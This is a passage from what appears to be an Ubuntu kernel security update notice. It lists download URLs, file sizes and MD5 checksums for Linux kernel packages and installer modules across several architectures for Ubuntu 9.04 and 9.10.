http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   163464 208a84b0506fcd9cadb25f1b7f9d26b7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   194828 596399bbfa9a92e3116c8f8d3a7d1391\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   152994 3cf4fb6614c5798cdcca7c8d7fd04a5b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    36486 b3cf4deb0dc4e11f095eb9bcf81546df\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:     5842 085134ad282a8b2580aa12a6ed64fd9e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    72152 5b6bf270db5279c7d79cbd5fca8e14f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    22714 a01ded50b855c5ed0580072a2277b74a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:     8874 f173072403f51e6e6da399debd91068f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    47442 e822623d7e4ae0bec0ea5094fed67dcf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    15656 2b2e6ad08af592fa3106adb4eb16324e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:  1273594 d873a895c58da3fcd5b8a0ea91f9a5ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    47204 c80f48bd49fddaae0188cf56350445f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    72706 dcc76877eef3af00d0280f96cafb6e45\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   126958 b184498c9d2a598d57e293bc09049cda\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    13472 1399e0100a81d92448659b83949a62a6\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   215860 fe00a3406a5496e200d5c4e5975469f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    46662 d7a61d1e363f9766795132d3325f02c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    41352 7d84e783cf7fc4111eaf964395440369\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    47402 2cd024da2955f7e35fe4519c8df5add5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    86924 515a3a07357e06f49b2e4384e2af7b8c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    33578 452adbbc84f5a5218610ddad25eb3ea0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   525752 1a2c59458472f4a18538df9386396703\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   125654 8678d7c3409daf24a373b4d11a0d9263\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    54874 94d4465b06d14b20af5803f2afddf53d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   301338 64a58b9a7ee5d53c2d1a486fe32deb93\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:  3746292 099947b9ddfb625da14b96bf1b9f59e6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_i386.deb\n      Size/MD5:   673824 c36739d12d66db8de4b6e270b1c91464\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_i386.deb\n      Size/MD5:   676398 c7091523d59d0b1cdd4453e12d5983d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_i386.deb\n      Size/MD5: 24662186 cfa5f52488fb3767debfefaf8940f6b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_i386.deb\n      Size/MD5: 24777004 b524e2b45df5e9d30ebc81717b5c62d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_i386.deb\n      Size/MD5: 10250016 09b9af49da34304c1dd280896ce9c0cd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_i386.deb\n      Size/MD5:   766288 4858bc3941dc0e545195c0b911142a4c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   218106 f4f03360ad8e2ee23a58b534e8a2c045\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   174922 fbc6643612c01e91066a87b6ec9c7125\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    30064 c8e4db00aa9c0c3b75c47c103d87b4c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   262814 794c683379e359de14db8806fe984f78\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:  2110070 da3e69dab278584e1abea5ee15d9b47d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   150230 7fc91b8ad535bfb705ba2cb2fc9ff57d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   184326 e505e555ac3bd0c33d00a47f7530f78c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   143584 209207f7e7887594a9d55d17bf1dca76\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    34576 cafc0f5f2db11f69d10e75815d3e9018\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:     5504 21cfbb5c1aa4c8d82bf3e1412646263f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    86018 0dc7720bee90887f4ebf5c71cf93d611\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    47636 fbebe71b83526192c08fd6d797ee8cb1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:     8714 14ed52e8c0a75151dd45acf3cb1ffc34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    44692 27502a17d5ca35cc31a9fd79ae7d2f1d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    14780 2c9ea91e8d8da2bff76c38a6cdce748d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:  1445966 33fa2ee03c566924552fc5b413e2ccf1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    44098 f740dcb377a692e2ff25a65424431e5b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    69290 a7e3130530005bf8fe4edabe8b003888\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   119528 a12c1a5bf9a112402d80e8f77ee87a1c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    12678 6646096dee2575f3bb33510e70bdd52b\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   215260 9a096eefa7f5e423c60fea41c314b9a5\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    46664 ba3b534d98d6717395ec66b402b3c701\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    40958 5950f34ca1fbd16f82a42020bc934ec6\n    http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    47312 0d7d48294720bbd387710d560756ce6a\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    86530 9e5c38cd42496250d5fcf951c6b5d4bd\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    33272 a8890faa31cf92122bcce2991374fe7e\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   523810 7b2a58ca4d024926c0f8101ab49242d6\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   125252 f48299cd45e2ef1a74017d1c7653976e\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    63568 135fe854fe31d2d8bd9cd09f40a266e5\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   300756 77668125ff976eaed45f3d2676a46c5f\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:  3035296 186cc64995c4fd4404241de5399eb0fb\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-18-lpia_2.6.28-18.59_lpia.deb\n      Size/MD5:   641460 1a4d29b73378acb8bcf88658f88dd08e\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-18-lpia_2.6.28-18.59_lpia.deb\n      Size/MD5: 21796372 d7455e818bf972ef7eb0fe54b7bd96dc\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_lpia.deb\n      Size/MD5:   766260 b67d9c1432185123449ed6826ed9588d\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   303982 80fe6dcf6d68a46047ef6ddc2c098614\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   157406 2cc8f76d83482452bb6073656a80b2ee\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    24442 28180da41edae2700e4c8a0e4f1c656f\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   260414 49a0b6bd418a0ff1d274ce8f602e2733\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:  2027576 241ee9a564502f3d8837806d5e6480d0\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   149398 b14f79b842c979418dec65e273836cd0\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   184736 a159624d12831598d35c3b00ba563182\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   143238 2720ae4f8cdad85066fc888e7fc3c796\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    34462 582363a3843fdbded2476793775ace76\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:     5496 67c7245d730a7b241eb9947afeef7669\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    85646 6a31ffe0054c27df1506ae34162ab79e\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    47402 ff41a000c4a3abbed18330e905a01b7b\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:     8718 15aa2d8fafced6b6e3b5a24c698b4089\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    63106 7a967940a04c1ee6a9626258e608b54c\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    14720 dc899d8630769d6270526c49f99a2af8\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:  1447832 400eeba1e83569d777954b21b6df593c\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    43898 16b0a1310e3f70dccfc8d0d5f971b064\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   155186 b22b41e37f88fe49531f5580e0f7f712\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   172666 df244ff125096be469b1c56a30f1e05f\n    http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:     8154 f2d765541e008431b4d3eae00f435b61\n\nUpdated packages for Ubuntu 9.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.dsc\n      Size/MD5:     2450 610bb83247876f8a8b47a0fd0d46fae8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.tar.gz\n      Size/MD5: 87052080 62b9dcb9ad24e659db1aa085f9e5a456\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.dsc\n      Size/MD5:     1906 a39c7ff46fb3ff74480d0e98366a486d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.tar.gz\n      Size/MD5: 81902928 c9e88b4f386710c3f22979986a7e3a34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.dsc\n      Size/MD5:     1943 25176b20de251c2e58bb95e2dd9c1c7b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.tar.gz\n      Size/MD5: 82470873 4d5238d3d11105852133d3eb802a95cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.diff.gz\n      Size/MD5:  2811600 b2b44f12a786758d470e6a29c09d0388\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.dsc\n      Size/MD5:     3782 ae6bf5844769d00004b919a6f61d588c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-304.10_all.deb\n      Size/MD5:  3790328 e35ab5c36ee1bac625d2a57bd19e0c5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-304.10_all.deb\n      Size/MD5: 64258256 70b947cc9e9012c9472f2c317f11ffae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304_2.6.31-304.10_all.deb\n      Size/MD5:  9662096 ac58cebef695901ea01bc7413b79109f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-19.56_all.deb\n      Size/MD5:  3791668 3836f273873fedf9d2293ee0d11df6ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19_2.6.31-19.56_all.deb\n      Size/MD5:  9531414 34d882276f33b0e37135c379a6e1c451\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-19.56_all.deb\n      Size/MD5: 62161518 9d3f3f79b9f14db8bd3dc68594eb8c8c\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_amd64.deb\n      Size/MD5:   603212 951db7e930eefc5fff9017c56badfb6e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_amd64.deb\n      Size/MD5: 18660056 e39dda7f87b093e927c34a928b842c7a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   221398 682a7dab5b571a7b2fd31f19daf724c1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    15536 55206db30b20aea4d7da38b342fc095d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    52128 1cde23d38ba6908e1123951ef4bc3c69\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    44828 94402e34a45cf232ae86f3cc08bf7f4f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    50072 65e128949b6f525d9028187fe1e7cc37\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    92518 338960088cec6b9b25ef2a96e96f3ebc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    37776 452d9c073d191ec2be1cad3aceb34490\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   537676 6bb8167794701151c613afe28a5c62c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   130666 ff5cf8923b89d0fa4b5c3c4a61ef93f7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    53846 ffdc544c68e862a0a3038c99ac2d73a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   310118 c2092f9a83a4f59145005f2c451d304b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:  4353666 3a04bb875ae70561075d05d5bb208977\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_amd64.deb\n      Size/MD5:   694766 85017cb531a49ea743cb7b30341b5ffa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-server_2.6.31-19.56_amd64.deb\n      Size/MD5:   694938 550a64d6d54ee5f34f1fb9eefbd4cc3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_amd64.deb\n      Size/MD5: 28924984 3001e6d36f6bf76621997bdbeb864234\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-server_2.6.31-19.56_amd64.deb\n      Size/MD5: 28885946 ff6296f4c684dd9facb011fc51b0b6f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_amd64.deb\n      Size/MD5: 11740736 287948976d92a7cae832a34ce33a99b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_amd64.deb\n      Size/MD5:   743052 35cb9d5d80b77a2586d08ffb65d3212a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   168272 fc4758b6b91802971538d3a3c519056d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   202768 73cfe4be43d350582d171ff0e178b6b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    27268 ae850a5e0ba4381a290b8f21ff88737f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   311688 3dab8c023e4aad0df74c5193aeaca49b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:  2282064 f09b0e8828effab3770bfc1da159a8f2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   158666 6765112bf6fed248c08465e47b4dab00\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   203112 fed91a4bc3d356a5a9bb1c6110337413\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   161072 faec6563ccef41e925482b36619fca7c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    38056 505cbeb1fdbf55eea7664a19dcedc11f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:     5762 a3ba57f83594477b27886cb3f4bd1b0d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    73750 53978367ed22b3daba246878064b72c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    22240 8a1036af3dacffb432813cc8422f6ae8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:     9548 f1e71c2129cc33f1ff139401b7b81547\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    39844 48e4aa79753fdb3ce1877ca1817b9fc6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    23484 f1be46cb2947ebe6b6d2e5b571d71a35\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:  1389556 2ba51ea53e5454f75c8b39f21481e45d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    47382 89f1dff9282f3c667cf1b8c2bc41353c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    51636 41311bd8c8459ba04789539733e6ff5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   128972 9697c034ed2bb74b5d18c5ae31fe1af0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    15814 8f46e8ddd6cac16dbdbc7c89cc94bee0\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_i386.deb\n      Size/MD5:   573528 fa913abed6caeb5c33eb2167f730956f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_i386.deb\n      Size/MD5: 17943372 803487f6122441604ec3062e7bb98228\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   198832 3282a330510666a582f6b8c0269d2f53\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    32458 03e2d90ce28677b7956fa2a72726d02e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    49938 c0d1953d9212f1569f04e8c8ba0db7ca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    42118 db5bcc80727cd1013bc8393df2a88e4c\n    